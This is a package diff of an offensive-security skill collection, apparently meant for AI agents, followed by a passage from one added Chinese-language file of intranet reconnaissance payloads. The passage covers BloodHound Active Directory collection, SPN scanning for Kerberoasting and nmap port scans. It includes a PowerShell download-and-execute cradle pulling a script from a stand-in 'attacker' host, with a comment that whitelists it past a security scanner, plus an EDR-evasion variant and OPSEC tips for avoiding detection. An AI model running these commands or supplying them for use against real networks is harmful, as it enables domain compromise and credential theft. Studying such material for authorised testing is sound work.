opencode-skills-collection 4.0.43 → 4.0.44

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (270) hide show
  1. package/bundled-skills/.antigravity-install-manifest.json +47 -1
  2. package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
  3. package/bundled-skills/api-security/SKILL.md +205 -0
  4. package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
  5. package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
  6. package/bundled-skills/apk-reverse/SKILL.md +438 -0
  7. package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
  8. package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
  9. package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
  10. package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
  11. package/bundled-skills/attack-chain/SKILL.md +185 -0
  12. package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
  13. package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
  14. package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
  15. package/bundled-skills/attack-chain/references/phases.md +490 -0
  16. package/bundled-skills/binary-diff/SKILL.md +320 -0
  17. package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
  18. package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
  19. package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
  20. package/bundled-skills/case-review/SKILL.md +167 -0
  21. package/bundled-skills/cloud-k8s/SKILL.md +124 -0
  22. package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
  23. package/bundled-skills/code-audit/SKILL.md +92 -0
  24. package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
  25. package/bundled-skills/database-security/SKILL.md +81 -0
  26. package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
  27. package/bundled-skills/diagram-generator/SKILL.md +199 -0
  28. package/bundled-skills/diagram-generator/references/README.md +3 -0
  29. package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
  30. package/bundled-skills/digital-forensics/SKILL.md +93 -0
  31. package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
  32. package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
  33. package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
  34. package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
  35. package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
  36. package/bundled-skills/docs/sources/sources.md +9 -0
  37. package/bundled-skills/docs/users/aas-core.md +1 -1
  38. package/bundled-skills/docs/users/bundles.md +1 -1
  39. package/bundled-skills/docs/users/claude-code-skills.md +1 -1
  40. package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
  41. package/bundled-skills/docs/users/kiro-integration.md +1 -1
  42. package/bundled-skills/docs/users/usage.md +3 -3
  43. package/bundled-skills/docs/users/visual-guide.md +4 -4
  44. package/bundled-skills/docs-generator/SKILL.md +197 -0
  45. package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
  46. package/bundled-skills/docs-generator/references/templates.md +102 -0
  47. package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
  48. package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
  49. package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
  50. package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
  51. package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
  52. package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
  53. package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
  54. package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
  55. package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
  56. package/bundled-skills/email-security/SKILL.md +81 -0
  57. package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
  58. package/bundled-skills/firmware-pentest/SKILL.md +381 -0
  59. package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
  60. package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
  61. package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
  62. package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
  63. package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
  64. package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
  65. package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
  66. package/bundled-skills/hardware-security/SKILL.md +80 -0
  67. package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
  68. package/bundled-skills/ida-reverse/SKILL.md +401 -0
  69. package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
  70. package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
  71. package/bundled-skills/identity-federation/SKILL.md +81 -0
  72. package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
  73. package/bundled-skills/instructree/SKILL.md +94 -0
  74. package/bundled-skills/js-reverse/SKILL.md +239 -0
  75. package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
  76. package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
  77. package/bundled-skills/js-reverse/references/env-patching.md +6 -0
  78. package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
  79. package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
  80. package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
  81. package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
  82. package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
  83. package/bundled-skills/js-reverse/references/output-contract.md +9 -0
  84. package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
  85. package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
  86. package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
  87. package/bundled-skills/llm-security/SKILL.md +160 -0
  88. package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
  89. package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
  90. package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
  91. package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
  92. package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
  93. package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
  94. package/bundled-skills/macos-reverse/SKILL.md +85 -0
  95. package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
  96. package/bundled-skills/malware-analysis/SKILL.md +311 -0
  97. package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
  98. package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
  99. package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
  100. package/bundled-skills/mobile-reverse/SKILL.md +222 -0
  101. package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
  102. package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
  103. package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
  104. package/bundled-skills/muapi-media/SKILL.md +311 -0
  105. package/bundled-skills/ot-ics/SKILL.md +117 -0
  106. package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
  107. package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
  108. package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
  109. package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
  110. package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
  111. package/bundled-skills/pentest-tools/SKILL.md +346 -0
  112. package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
  113. package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
  114. package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
  115. package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
  116. package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
  117. package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
  118. package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
  119. package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
  120. package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
  121. package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
  122. package/bundled-skills/pentest-tools/references/payloads.md +32 -0
  123. package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
  124. package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
  125. package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
  126. package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
  127. package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
  128. package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
  129. package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
  130. package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
  131. package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
  132. package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
  133. package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
  134. package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
  135. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
  136. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
  137. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
  138. package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
  139. package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
  140. package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
  141. package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
  142. package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
  143. package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
  144. package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
  145. package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
  146. package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
  147. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
  148. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
  149. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
  150. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
  151. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
  152. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
  153. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
  154. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
  155. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
  156. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
  157. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
  158. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
  159. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
  160. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
  161. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
  162. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
  163. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
  164. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
  165. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
  166. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
  167. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
  168. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
  169. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
  170. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
  171. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
  172. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
  173. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
  174. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
  175. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
  176. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
  177. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
  178. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
  179. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
  180. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
  181. package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
  182. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
  183. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
  184. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
  185. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
  186. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
  187. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
  188. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
  189. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
  190. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
  191. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
  192. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
  193. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
  194. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
  195. package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
  196. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
  197. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
  198. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
  199. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
  200. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
  201. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
  202. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
  203. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
  204. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
  205. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
  206. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
  207. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
  208. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
  209. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
  210. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
  211. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
  212. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
  213. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
  214. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
  215. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
  216. package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
  217. package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
  218. package/bundled-skills/protocol-reverse/SKILL.md +108 -0
  219. package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
  220. package/bundled-skills/pwn-chain/SKILL.md +209 -0
  221. package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
  222. package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
  223. package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
  224. package/bundled-skills/radare2/SKILL.md +460 -0
  225. package/bundled-skills/radare2/references/cheatsheet.md +129 -0
  226. package/bundled-skills/radio-sdr/SKILL.md +77 -0
  227. package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
  228. package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
  229. package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
  230. package/bundled-skills/reverse-engineering/SKILL.md +213 -0
  231. package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
  232. package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
  233. package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
  234. package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
  235. package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
  236. package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
  237. package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
  238. package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
  239. package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
  240. package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
  241. package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
  242. package/bundled-skills/reverse-engineering/references/languages.md +499 -0
  243. package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
  244. package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
  245. package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
  246. package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
  247. package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
  248. package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
  249. package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
  250. package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
  251. package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
  252. package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
  253. package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
  254. package/bundled-skills/reverse-engineering/references/tools.md +546 -0
  255. package/bundled-skills/supply-chain-security/SKILL.md +180 -0
  256. package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
  257. package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
  258. package/bundled-skills/thick-client/SKILL.md +104 -0
  259. package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
  260. package/bundled-skills/threat-hunting/SKILL.md +94 -0
  261. package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
  262. package/bundled-skills/threat-intelligence/SKILL.md +176 -0
  263. package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
  264. package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
  265. package/bundled-skills/wifi-wireless/SKILL.md +80 -0
  266. package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
  267. package/bundled-skills/windows-ad/SKILL.md +109 -0
  268. package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
  269. package/package.json +1 -1
  270. package/skills_index.json +1214 -2
@@ -0,0 +1,947 @@
1
+ # 信息收集
2
+
3
+ _12 条 intranet payload_
4
+
5
+ ### BloodHound域分析 `bloodhound-enumeration`
6
+ _使用BloodHound分析Active Directory攻击路径_
7
+ 子类:**域分析** · tags: `bloodhound` `active-directory` `enumeration` `neo4j`
8
+
9
+ **前置条件:**
10
+ - 域环境
11
+ - 域用户凭证
12
+ - BloodHound工具
13
+
14
+ **攻击链:**
15
+
16
+ **SharpHound采集**
17
+ > 使用SharpHound采集域信息
18
+ _platform: windows_
19
+ ```
20
+ SharpHound.exe -c All
21
+ ```
22
+ **语法解析:**
23
+ - `SharpHound.exe` — BloodHound数据采集工具 _command_
24
+ - `-c All` — 采集所有类型的数据 _parameter_
25
+
26
+ **PowerShell采集**
27
+ > 通过PowerShell远程加载采集
28
+ _platform: windows_
29
+ ```
30
+ IEX(New-Object Net.WebClient).DownloadString("http://attacker/SharpHound.ps1"); Invoke-BloodHound -CollectionMethod All # security-allowlist: SEC005
31
+ ```
32
+ **语法解析:**
33
+ - `Invoke-BloodHound` — PowerShell版本的采集命令 _command_
34
+ - `-CollectionMethod` — 指定采集方法 _parameter_
35
+
36
+ **bloodhound-python**
37
+ > 使用Python版本采集
38
+ _platform: linux_
39
+ ```
40
+ bloodhound-python -u user -p password -d target.com -ns dc_ip
41
+ ```
42
+ **语法解析:**
43
+ - `bloodhound-python` — Python版BloodHound采集器 _command_
44
+ - `-u` — 用户名 _parameter_
45
+ - `-d` — 域名 _parameter_
46
+ - `-ns` — 域名服务器 _parameter_
47
+
48
+ **指定域控制器**
49
+ > 指定域控制器采集
50
+ _platform: windows_
51
+ ```
52
+ SharpHound.exe -c All --LdapUsername user --LdapPassword pass --DomainController dc.target.com
53
+ ```
54
+ **语法解析:**
55
+ - `--LdapUsername` — LDAP认证用户名 _parameter_
56
+ - `--DomainController` — 指定域控制器 _parameter_
57
+
58
+ **启动Neo4j**
59
+ > 启动Neo4j数据库
60
+ _platform: linux_
61
+ ```
62
+ sudo neo4j console
63
+ ```
64
+
65
+ **Cypher查询域管**
66
+ > 查询域管理员用户
67
+ ```
68
+ MATCH (n:User) WHERE n.admincount=true RETURN n
69
+ ```
70
+
71
+ **查询攻击路径**
72
+ > 查询到域管理员的最短路径
73
+ ```
74
+ MATCH p=shortestPath((n:User)-[*1..]->(m:Group)) WHERE m.name="DOMAIN ADMINS@DOMAIN.COM" RETURN p
75
+ ```
76
+
77
+ **EDR 绕过变体:**
78
+
79
+ **隐蔽采集**
80
+ > 随机化文件名避免检测
81
+ ```
82
+ SharpHound.exe -c All --LdapUsername user --LdapPassword pass --OutputDirectory C:\Users\Public --RandomizeFilenames
83
+ ```
84
+
85
+
86
+ **分析:** BloodHound可发现域内的攻击路径,如权限提升路径、会话信息、组关系等。
87
+
88
+ **OPSEC 提示:**
89
+ - BloodHound采集会产生大量LDAP查询
90
+ - 可能触发域控制器告警
91
+ - 建议在非工作时间执行
92
+
93
+ **概述:** BloodHound是一款用于分析Active Directory信任关系的工具,可以可视化攻击路径,帮助发现权限提升机会。
94
+
95
+ **漏洞原理:** Active Directory的复杂信任关系可能导致意外的权限提升路径,BloodHound可以发现这些路径。
96
+
97
+ **利用方法:** 利用流程:1) 采集域信息;2) 导入BloodHound;3) 分析攻击路径;4) 发现权限提升机会;5) 执行攻击。
98
+
99
+ **防御措施:** 防御措施:1) 定期审计AD权限;2) 最小权限原则;3) 监控异常LDAP查询;4) 清理不必要的信任关系。
100
+
101
+ ---
102
+
103
+ ### SPN扫描 `spn-scan`
104
+ _扫描域内服务主体名称_
105
+ 子类:**SPN** · tags: `spn` `kerberos` `enumeration`
106
+
107
+ **前置条件:**
108
+ - 域环境
109
+ - 任意域用户凭证
110
+
111
+ **攻击链:**
112
+
113
+ **查询所有SPN**
114
+ > 查询域内所有SPN
115
+ _platform: windows_
116
+ ```
117
+ setspn -T domain.com -Q */*
118
+ ```
119
+ **语法解析:**
120
+ - `setspn` — Service Principal Name工具 _command_
121
+ - `-T` — 指定域 _parameter_
122
+ - `-Q` — 查询模式 _parameter_
123
+
124
+ **PowerShell查询**
125
+ > PowerShell查询SPN用户
126
+ _platform: windows_
127
+ ```
128
+ Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName
129
+ ```
130
+ **语法解析:**
131
+ - `Get-ADUser` — 获取AD用户命令 _command_
132
+ - `-Filter` — 过滤条件 _parameter_
133
+ - `-Properties` — 返回的属性 _parameter_
134
+
135
+ **Impacket查询**
136
+ > Impacket查询SPN
137
+ _platform: linux_
138
+ ```
139
+ GetUserSPNs.py domain/user:password -dc-ip dc_ip
140
+ ```
141
+ **语法解析:**
142
+ - `GetUserSPNs.py` — Impacket SPN查询工具 _command_
143
+ - `-dc-ip` — 域控制器IP _parameter_
144
+
145
+ **查询特定服务**
146
+ > 查询HTTP服务的SPN
147
+ _platform: windows_
148
+ ```
149
+ setspn -T domain.com -Q HTTP/*
150
+ ```
151
+
152
+ **查找SQL服务**
153
+ > 查询MSSQL服务的SPN
154
+ _platform: windows_
155
+ ```
156
+ setspn -T domain.com -Q MSSQLSvc/*
157
+ ```
158
+
159
+
160
+ **分析:** SPN扫描可以发现域内运行的服务账户,为Kerberoasting攻击做准备。
161
+
162
+ **OPSEC 提示:**
163
+ - SPN查询是正常的域操作
164
+ - 不会触发明显告警
165
+ - 可用于后续Kerberoasting攻击
166
+
167
+ **概述:** SPN扫描可以发现域内运行的服务账户,为Kerberoasting攻击做准备。
168
+
169
+ **漏洞原理:** SPN是Kerberos认证的一部分,攻击者可以通过SPN找到高价值的服务账户。
170
+
171
+ **利用方法:** 利用流程:1) 扫描SPN;2) 识别高价值账户;3) 请求Kerberos票据;4) 离线破解。
172
+
173
+ **防御措施:** 防御措施:1) 服务账户使用强密码;2) 监控异常的SPN查询;3) 定期审计SPN账户。
174
+
175
+ ---
176
+
177
+ ### 内网端口扫描 `port-scan`
178
+ _内网端口扫描与服务识别_
179
+ 子类:**端口扫描** · tags: `nmap` `port-scan` `enumeration`
180
+
181
+ **前置条件:**
182
+ - 内网访问权限
183
+ - 扫描工具
184
+
185
+ **攻击链:**
186
+
187
+ **快速扫描**
188
+ > 快速扫描常用端口
189
+ _platform: linux_
190
+ ```
191
+ nmap -sS -T4 -F 192.168.1.0/24
192
+ ```
193
+ **语法解析:**
194
+ - `-sS` — SYN扫描,半开放扫描 _parameter_
195
+ - `-T4` — 扫描速度模板(0-5) _parameter_
196
+ - `-F` — 快速模式,只扫常用端口 _parameter_
197
+
198
+ **全端口扫描**
199
+ > 扫描所有65535端口
200
+ _platform: linux_
201
+ ```
202
+ nmap -sS -p- 192.168.1.1
203
+ ```
204
+ **语法解析:**
205
+ - `-p-` — 扫描所有端口(1-65535) _parameter_
206
+
207
+ **服务识别**
208
+ > 服务版本探测和脚本扫描
209
+ _platform: linux_
210
+ ```
211
+ nmap -sV -sC 192.168.1.1
212
+ ```
213
+ **语法解析:**
